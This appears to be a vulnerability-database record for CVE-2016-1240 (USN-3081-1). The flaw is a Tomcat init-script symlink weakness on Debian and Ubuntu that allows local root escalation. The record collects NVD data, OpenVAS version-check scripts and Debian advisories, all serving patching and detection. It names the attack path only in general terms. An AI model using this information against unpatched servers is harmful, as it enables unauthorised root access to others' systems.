ID USN-3081-1 Type ubuntu Reporter Ubuntu Modified 2016-09-19T00:00:00
Description
Dawid Golunski discovered that the Tomcat init script incorrectly handled creating log files. A remote attacker could possibly use this issue to obtain root privileges. (CVE-2016-1240)
This update also reverts a change in behaviour introduced in USN-3024-1 by setting mapperContextRootRedirectEnabled to True by default.
{"cve": [{"lastseen": "2019-05-29T18:15:33", "bulletinFamily": "NVD", "description": "The Tomcat init script in the tomcat7 package before 7.0.56-3+deb8u4 and tomcat8 package before 8.0.14-1+deb8u3 on Debian jessie and the tomcat6 and libtomcat6-java packages before 6.0.35-1ubuntu3.8 on Ubuntu 12.04 LTS, the tomcat7 and libtomcat7-java packages before 7.0.52-1ubuntu0.7 on Ubuntu 14.04 LTS, and tomcat8 and libtomcat8-java packages before 8.0.32-1ubuntu1.2 on Ubuntu 16.04 LTS allows local users with access to the tomcat account to gain root privileges via a symlink attack on the Catalina log file, as demonstrated by /var/log/tomcat7/catalina.out.", "modified": "2018-10-09T19:59:00", "id": "CVE-2016-1240", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1240", "published": "2016-10-03T15:59:00", "title": "CVE-2016-1240", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:54:16", "bulletinFamily": "scanner", "description": "Dawid Golunski of LegalHackers discovered\nthat the Tomcat init script performed unsafe file handling, which could result in\nlocal privilege escalation.", "modified": "2017-07-07T00:00:00", "published": "2016-09-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703669", "id": "OPENVAS:703669", "title": "Debian Security Advisory DSA 3669-1 (tomcat7 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3669.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3669-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703669);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-1240\");\n script_name(\"Debian Security Advisory DSA 3669-1 (tomcat7 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-09-15 00:00:00 +0200 (Thu, 15 Sep 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3669.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"tomcat7 on Debian Linux\");\n script_tag(name: \"insight\", value: \"Apache Tomcat implements the Java Servlet\nand the JavaServer Pages (JSP) specifications from Sun Microsystems, and provides a\n'pure Java' HTTP web server environment for Java code to run.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), this\nproblem has been fixed in version 7.0.56-3+deb8u4.\n\nWe recommend that you upgrade your tomcat7 packages.\");\n script_tag(name: \"summary\", value: \"Dawid Golunski of LegalHackers discovered\nthat the Tomcat init script performed unsafe file handling, which could result in\nlocal privilege escalation.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\"); \n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-admin\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-common\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-docs\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-examples\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-user\", ver:\"7.0.56-3+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:46", "bulletinFamily": "scanner", "description": "Dawid Golunski of LegalHackers discovered\nthat the Tomcat init script performed unsafe file handling, which could result in\nlocal privilege escalation.", "modified": "2019-03-18T00:00:00", "published": "2016-09-15T00:00:00", "id": "OPENVAS:1361412562310703669", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703669", "title": "Debian Security Advisory DSA 3669-1 (tomcat7 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3669.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3669-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703669\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-1240\");\n script_name(\"Debian Security Advisory DSA 3669-1 (tomcat7 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-15 00:00:00 +0200 (Thu, 15 Sep 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3669.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"tomcat7 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), this\nproblem has been fixed in version 7.0.56-3+deb8u4.\n\nWe recommend that you upgrade your tomcat7 packages.\");\n script_tag(name:\"summary\", value:\"Dawid Golunski of LegalHackers discovered\nthat the Tomcat init script performed unsafe file handling, which could result in\nlocal privilege escalation.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-admin\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-common\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-docs\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-examples\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat7-user\", ver:\"7.0.56-3+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:44", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-09-20T00:00:00", "id": "OPENVAS:1361412562310842892", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842892", "title": "Ubuntu Update for tomcat8 USN-3081-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for tomcat8 USN-3081-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842892\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-20 05:41:58 +0200 (Tue, 20 Sep 2016)\");\n script_cve_id(\"CVE-2016-1240\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for tomcat8 USN-3081-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Dawid Golunski discovered that the Tomcat\n init script incorrectly handled creating log files. A remote attacker could\n possibly use this issue to obtain root privileges. (CVE-2016-1240)\n\nThis update also reverts a change in behaviour introduced in USN-3024-1 by\nsetting mapperContextRootRedirectEnabled to True by default.\");\n script_tag(name:\"affected\", value:\"tomcat8 on Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3081-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3081-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.52-1ubuntu0.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.52-1ubuntu0.7\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libtomcat6-java\", ver:\"6.0.35-1ubuntu3.8\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"tomcat6\", ver:\"6.0.35-1ubuntu3.8\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.32-1ubuntu1.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.32-1ubuntu1.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:55:05", "bulletinFamily": "scanner", "description": "Dawid Golunski of LegalHackers discovered\nthat the Tomcat init script performed unsafe file handling, which could result in\nlocal privilege escalation.", "modified": "2017-07-07T00:00:00", "published": "2016-09-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703670", "id": "OPENVAS:703670", "title": "Debian Security Advisory DSA 3670-1 (tomcat8 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3670.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3670-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703670);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-1240\");\n script_name(\"Debian Security Advisory DSA 3670-1 (tomcat8 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-09-15 00:00:00 +0200 (Thu, 15 Sep 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3670.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"tomcat8 on Debian Linux\");\n script_tag(name: \"insight\", value: \"Apache Tomcat implements the Java\nServlet and the JavaServer Pages (JSP) specifications from Oracle, and provides\na 'pure Java' HTTP web server environment for Java code to run.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthis problem has been fixed in version 8.0.14-1+deb8u3.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your tomcat8 packages.\");\n script_tag(name: \"summary\", value: \"Dawid Golunski of LegalHackers discovered\nthat the Tomcat init script performed unsafe file handling, which could result in\nlocal privilege escalation.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.0.14-1+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:20", "bulletinFamily": "scanner", "description": "Dawid Golunski of LegalHackers discovered\nthat the Tomcat init script performed unsafe file handling, which could result in\nlocal privilege escalation.", "modified": "2019-03-18T00:00:00", "published": "2016-09-15T00:00:00", "id": "OPENVAS:1361412562310703670", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703670", "title": "Debian Security Advisory DSA 3670-1 (tomcat8 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3670.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3670-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703670\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-1240\");\n script_name(\"Debian Security Advisory DSA 3670-1 (tomcat8 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-15 00:00:00 +0200 (Thu, 15 Sep 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3670.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"tomcat8 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthis problem has been fixed in version 8.0.14-1+deb8u3.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your tomcat8 packages.\");\n script_tag(name:\"summary\", value:\"Dawid Golunski of LegalHackers discovered\nthat the Tomcat init script performed unsafe file handling, which could result in\nlocal privilege escalation.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.0.14-1+deb8u3\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:23:03", "bulletinFamily": "unix", "description": "Package : tomcat7\nVersion : 7.0.28-4+deb7u6\nCVE ID : CVE-2016-1240\n\n\nDawid Golunski from legalhackers.com discovered that Debian's version\nof Tomcat 7 was vulnerable to a local privilege escalation. Local\nattackers who have gained access to the server in the context of the\ntomcat7 user through a vulnerability in a web application were able to\nreplace the file with a symlink to an arbitrary file.\n\nThe full advisory can be found at\n\nhttp://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-Escalation-Exploit.txt\n\nIn addition this security update also fixes Debian bug #821391. File\nownership in /etc/tomcat7 will no longer be unconditionally overridden\non upgrade. As another precaution the file permissions of Debian\nspecific configuration files in /etc/tomcat7 were changed to 640 to\ndisallow world readable access.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n7.0.28-4+deb7u6.\n\nWe recommend that you upgrade your tomcat7 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "modified": "2016-09-15T15:08:18", "published": "2016-09-15T15:08:18", "id": "DEBIAN:DLA-623-1:9251E", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201609/msg00016.html", "title": "[SECURITY] [DLA 623-1] tomcat7 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:49", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3669-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nSeptember 15, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : tomcat7\nCVE ID : CVE-2016-1240\n\nDawid Golunski of LegalHackers discovered that the Tomcat init script\nperformed unsafe file handling, which could result in local privilege\nescalation.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 7.0.56-3+deb8u4.\n\nWe recommend that you upgrade your tomcat7 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2016-09-15T17:27:26", "published": "2016-09-15T17:27:26", "id": "DEBIAN:DSA-3669-1:CFB19", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00248.html", "title": "[SECURITY] [DSA 3669-1] tomcat7 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:27", "bulletinFamily": "unix", "description": "Package : tomcat6\nVersion : 6.0.45+dfsg-1~deb7u2\nCVE ID : CVE-2016-1240\n\n\n\nDawid Golunski from legalhackers.com discovered that Debian's version\nof Tomcat 6 was vulnerable to a local privilege escalation. Local\nattackers who have gained access to the server in the context of the\ntomcat6 user through a vulnerability in a web application were able to\nreplace the file with a symlink to an arbitrary file.\n\nThe full advisory can be found at\n\nhttp://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-Es\ncalation-Exploit.txt\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n6.0.45+dfsg-1~deb7u2.\n\nWe recommend that you upgrade your tomcat6 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "modified": "2016-09-15T14:47:02", "published": "2016-09-15T14:47:02", "id": "DEBIAN:DLA-622-1:61A2B", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201609/msg00015.html", "title": 